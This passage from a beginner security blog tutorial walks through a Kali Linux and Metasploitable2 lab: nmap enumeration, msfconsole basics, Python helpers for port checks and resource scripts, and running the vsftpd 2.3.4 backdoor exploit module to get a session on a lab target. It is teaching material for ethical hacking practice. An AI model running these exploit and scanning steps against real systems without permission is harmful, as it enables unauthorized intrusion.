</li>
</ul>
<p>This ensures:</p>
<ul>
<li><p>Kali ↔ Metasploitable2 communication</p>
</li>
<li><p>No internet exposure (safe lab)</p>
</li>
</ul>
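<p>A quick way to sanity-check the "same network" requirement is to compare the two addresses with Python's standard <code>ipaddress</code> module. This is a sketch under assumptions: the Kali address below is hypothetical, and the <code>/24</code> prefix is assumed for the host-only network, so replace both with your own values.</p>
<pre><code class="lang-python">import ipaddress


def same_subnet(ip_a, ip_b, prefix_length=24):
    """Return True when both addresses fall inside the same network."""
    network = ipaddress.ip_network(f"{ip_a}/{prefix_length}", strict=False)
    return ipaddress.ip_address(ip_b) in network


TARGET_IP = "192.168.56.101"  # Metasploitable2 address used in this lab
KALI_IP = "192.168.56.102"    # hypothetical Kali address, replace with yours

print(same_subnet(KALI_IP, TARGET_IP))
</code></pre>
<p>If this prints <code>False</code>, one of the VMs is probably still attached to a different adapter type, so recheck the adapter settings on both machines.</p>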
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*jw_6awLbGPXPpHGiSwUheg.png" alt /></p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*4YuIMsvhpt9eC4OBsvdfbg.png" alt /></p>
<h2 id="heading-4-test-connectivity-very-important"><strong>4. Test Connectivity (Very Important)</strong></h2>
<h2 id="heading-from-kali-linux"><strong>From Kali Linux:</strong></h2>
<pre><code class="lang-plaintext">ping 192.168.56.101
</code></pre>
<p>If you receive replies, your lab network is working correctly. Press <code>Ctrl+C</code> to stop the ping.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*GfrW8rPEuFozFSKXF6kvbQ.png" alt /></p>
<h2 id="heading-5-confirm-target-visibility-using-nmap"><strong>5. Confirm Target Visibility Using Nmap</strong></h2>
<p>Before using Metasploit, enumerate the target first. You need to know which services are running before you can choose a module.</p>
<pre><code class="lang-plaintext">nmap -sV 192.168.56.101
</code></pre>
<p>You should see multiple <strong>intentionally vulnerable services</strong>, such as:</p>
<ul>
<li><p>FTP (vsftpd 2.3.4)</p>
</li>
<li><p>SSH</p>
</li>
<li><p>Samba</p>
</li>
<li><p>Tomcat</p>
</li>
</ul>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*URDqkjKlFLdGB6D8vvClcg.png" alt /></p>
<p>This confirms that <strong>Metasploitable2 is ready for exploitation</strong>.</p>
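<p>The same reachability check can be sketched in Python with plain TCP connections. This is not a replacement for Nmap, since it does no version detection. The port numbers are assumptions based on the usual Metasploitable2 defaults (FTP on 21, SSH on 22, Samba on 445, Tomcat on 8180), so confirm them against your own scan.</p>
<pre><code class="lang-python">import socket

# Assumed default ports; verify them against your own nmap output.
EXPECTED_SERVICES = {"ftp": 21, "ssh": 22, "samba": 445, "tomcat": 8180}


def is_port_open(host, port, timeout=2.0):
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


def check_services(host, services=EXPECTED_SERVICES):
    """Map each service name to True (reachable) or False."""
    return {name: is_port_open(host, port) for name, port in services.items()}
</code></pre>
<p>Calling <code>check_services("192.168.56.101")</code> from Kali returns a dictionary of service names and booleans. A <code>False</code> value means the port is closed, filtered, or the host is unreachable.</p>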
<h2 id="heading-setup-checklist"><strong>Setup Checklist</strong></h2>
<p>✔ Kali Linux boots successfully<br />✔ <code>msfconsole</code> launches without errors<br />✔ Metasploitable2 is accessible<br />✔ Both machines are on the same subnet<br />✔ Ping &amp; Nmap scans work</p>
<p>Once all checks pass, your lab is <strong>fully prepared</strong>.</p>
<h2 id="heading-basic-msfconsole-commands-getting-comfortable-with-the-interface"><strong>Basic</strong> <code>msfconsole</code> Commands (Getting Comfortable with the Interface)</h2>
<p>Before jumping into exploitation, it’s important to understand the <strong>basic operating system–style commands</strong> and navigation used inside <code>msfconsole</code>. This section helps beginners feel confident while working in the Metasploit environment.</p>
<p>We are using <strong>Kali Linux</strong> with the <strong>Metasploit Framework</strong>.</p>
<h2 id="heading-starting-msfconsole"><strong>Starting</strong> <code>msfconsole</code></h2>
<p>Open a terminal in Kali Linux and run:</p>
<pre><code class="lang-plaintext">msfconsole
</code></pre>
<p>Once loaded, you will see:</p>
<pre><code class="lang-plaintext">msf6 &gt;
</code></pre>
<p>This prompt indicates that <code>msfconsole</code> is ready to accept commands.</p>
<h2 id="heading-getting-help-in-msfconsole"><strong>Getting Help in</strong> <code>msfconsole</code></h2>
<h2 id="heading-show-all-commands"><strong>Show All Commands</strong></h2>
<pre><code class="lang-plaintext">help
</code></pre>
<p>or simply:</p>
<pre><code class="lang-plaintext">?
</code></pre>
<p>This lists all available commands, similar to using <code>help</code> in an operating system shell.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*3Srbz0J8FUP1JeGKlzyaDA.png" alt /></p>
<h2 id="heading-navigation-commands-os-like-basics"><strong>Navigation Commands (OS-Like Basics)</strong></h2>
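<table>
<thead>
<tr><th>Command</th><th>Description</th></tr>
</thead>
<tbody>
<tr><td><code>pwd</code></td><td>Prints the current working directory</td></tr>
<tr><td><code>cd</code></td><td>Changes the console's working directory</td></tr>
<tr><td><code>ls</code></td><td>Lists files in the working directory</td></tr>
<tr><td><code>clear</code></td><td>Clears the screen</td></tr>
</tbody>
</table>
<p>Example:</p>
<pre><code class="lang-plaintext">pwd
ls
</code></pre>
<p>These commands act on the <strong>Linux filesystem</strong>, not on Metasploit's module tree. <code>cd</code> is a built-in console command; anything <code>msfconsole</code> does not recognize, such as <code>pwd</code>, <code>ls</code>, or <code>clear</code>, is handed to the system shell. To browse modules, use <code>search</code> or <code>show</code> instead.</p>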
<h2 id="heading-searching-for-modules"><strong>Searching for Modules</strong></h2>
<p>One of the most used commands:</p>
<pre><code class="lang-plaintext">search &lt;keyword&gt;
</code></pre>
<p>Example:</p>
<pre><code class="lang-plaintext">search ftp
search samba
search vsftpd
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*_59RCXTD8OlOBxmtHTKWTw.png" alt /></p>
<p>This helps you quickly find:</p>
<ul>
<li><p>Exploits</p>
</li>
<li><p>Auxiliary scanners</p>
</li>
<li><p>Payloads</p>
</li>
</ul>
<h2 id="heading-understanding-module-types"><strong>Understanding Module Types</strong></h2>
<p>Metasploit is organized into different <strong>module types</strong>, each designed for a specific purpose in the penetration testing lifecycle.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*mup8HD7Ny-wJB_UHIm-wsA.png" alt /></p>
<p>You can list the modules of a given type using:</p>
<pre><code class="lang-plaintext">show exploits
show auxiliary
</code></pre>
<h2 id="heading-using-a-module"><strong>Using a Module</strong></h2>
<p>To select a module:</p>
<pre><code class="lang-plaintext">use exploit/unix/ftp/vsftpd_234_backdoor
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*BOa3f7W203Dorp7kN5ly0g.png" alt /></p>
<p>Once selected, the prompt changes to:</p>
<pre><code class="lang-plaintext">msf6 exploit(unix/ftp/vsftpd_234_backdoor) &gt;
</code></pre>
<p>This tells you <strong>which module is currently active</strong>.</p>
<h2 id="heading-viewing-amp-setting-options"><strong>Viewing &amp; Setting Options</strong></h2>
<h2 id="heading-show-required-options"><strong>Show Required Options</strong></h2>
<pre><code class="lang-plaintext">show options
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*YQCTkTtyTuH2KCRHknxBog.png" alt /></p>
<h2 id="heading-set-target-ip"><strong>Set Target IP</strong></h2>
<pre><code class="lang-plaintext">set RHOSTS 192.168.56.101
</code></pre>
<h2 id="heading-set-port-if-needed"><strong>Set Port (if needed)</strong></h2>
<pre><code class="lang-plaintext">set RPORT 21
</code></pre>
<p>To verify:</p>
<pre><code class="lang-plaintext">show options
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*XWEtzl5SBnYN4wkrQJPeXA.png" alt /></p>
<h2 id="heading-running-a-module"><strong>Running a Module</strong></h2>
<pre><code class="lang-plaintext">run
</code></pre>
<p>or</p>
<pre><code class="lang-plaintext">exploit
</code></pre>
<p>Both commands do the same thing.</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*H9vWWSHvNAf6eQbcVLjrLQ.png" alt /></p>
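<p>Once you are comfortable typing these commands by hand, the same sequence can be kept in a Metasploit resource script, which <code>msfconsole</code> can load with its <code>-r</code> option. The Python sketch below only builds the text of such a script from the commands used in this section; the function name and the file name mentioned afterwards are hypothetical.</p>
<pre><code class="lang-python">def build_resource_script(module, rhosts, rport=None):
    """Return msfconsole commands, one per line, as resource script text."""
    lines = [f"use {module}", f"set RHOSTS {rhosts}"]
    if rport is not None:
        lines.append(f"set RPORT {rport}")
    lines.append("show options")  # review the settings before running
    lines.append("run")
    return "\n".join(lines) + "\n"


script = build_resource_script(
    "exploit/unix/ftp/vsftpd_234_backdoor", "192.168.56.101", rport=21
)
print(script, end="")
</code></pre>
<p>Save the printed text to a file such as <code>vsftpd_lab.rc</code> and start the console with <code>msfconsole -r vsftpd_lab.rc</code>. Only run it against your own lab target.</p>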
<h2 id="heading-session-management-basics"><strong>Session Management Basics</strong></h2>
<p>After successful exploitation:</p>
<pre><code class="lang-plaintext">sessions
</code></pre>
<p>Interact with a session:</p>
<pre><code class="lang-plaintext">sessions -i 1
</code></pre>
<p>Exit session:</p>
<pre><code class="lang-plaintext">exit
</code></pre>
<p><img src="https://miro.medium.com/v2/resize:fit:1400/1*mYxSH7v_A7HnR1W6QTTkbw.png" alt /></p>
<h2 id="heading-exiting-modules-amp-msfconsole"><strong>Exiting Modules &amp;</strong> <code>msfconsole</code></h2>
<p>In Metasploit, use <code>back</code> to leave the current module and return to the main console. Use <code>quit</code> or <code>exit</code> to close <code>msfconsole</code> completely.</p>
<h2 id="heading-key-takeaways"><strong>Key Takeaways</strong></h2>
<p>✔ <code>msfconsole</code> feels like a mini operating system<br />✔ <code>search</code>, <code>use</code>, and <code>show options</code> are core commands<br />✔ Always understand a module before running it<br />✔ Enumeration comes before exploitation</p>
<h2 id="heading-conclusion"><strong>Conclusion</strong></h2>
<p>In this blog, we explored how <code>msfconsole</code>, the core interface of the <strong>Metasploit Framework</strong>, can be used to exploit a vulnerable <strong>FTP service</strong> on <strong>Metasploitable2</strong> from an attacker machine running <strong>Kali Linux</strong>.</p>
<p>Starting from proper lab setup and network configuration, we moved through the essential stages of a penetration test: <strong>service enumeration, exploit selection, configuration, and execution</strong>. By exploiting the outdated <code>vsftpd 2.3.4</code> service, we demonstrated how a single vulnerable service can lead to <strong>full system compromise</strong> when basic security practices are ignored.</p>
<p>This exercise highlights several important lessons:</p>
<ul>
<li><p>Enumeration is more important than exploitation</p>
</li>
<li><p>Outdated services pose serious security risks</p>
</li>
<li><p>Automation tools like <code>msfconsole</code> must be used with understanding, not blindly</p>
</li>
<li><p>Ethical hacking is about <strong>learning and improving security</strong>, not breaking systems</p>
</li>
</ul>
<p>Practicing in a controlled environment like Metasploitable2 helps build a strong foundation for <strong>CTFs, real-world penetration testing, and defensive security awareness</strong>.</p>
<p>In future labs, this knowledge can be extended to:</p>
<ul>
<li><p>Exploiting other services such as Samba and Tomcat</p>
</li>
<li><p>Using Meterpreter for advanced post-exploitation</p>
</li>
<li><p>Understanding how blue teams detect and prevent such attacks</p>
</li>
</ul>
<blockquote>
<p><strong><em>Always remember:</em></strong> <em>with great power comes great responsibility. Use these skills only where you have explicit permission.</em></p>
</blockquote>
<p>Follow Kubesimplify on <a target="_blank" href="https://blog.kubesimplify.com/"><strong>Hashnode</strong></a>, <a target="_blank" href="https://twitter.com/kubesimplify"><strong>Twitter/X</strong></a> and <a target="_blank" href="https://www.linkedin.com/company/kubesimplify"><strong>LinkedIn</strong></a>. Join our <a target="_blank" href="https://kubesimplify.com/discord"><strong>Discord server</strong></a> to learn with us!</p>
]]></content:encoded></item></channel></rss>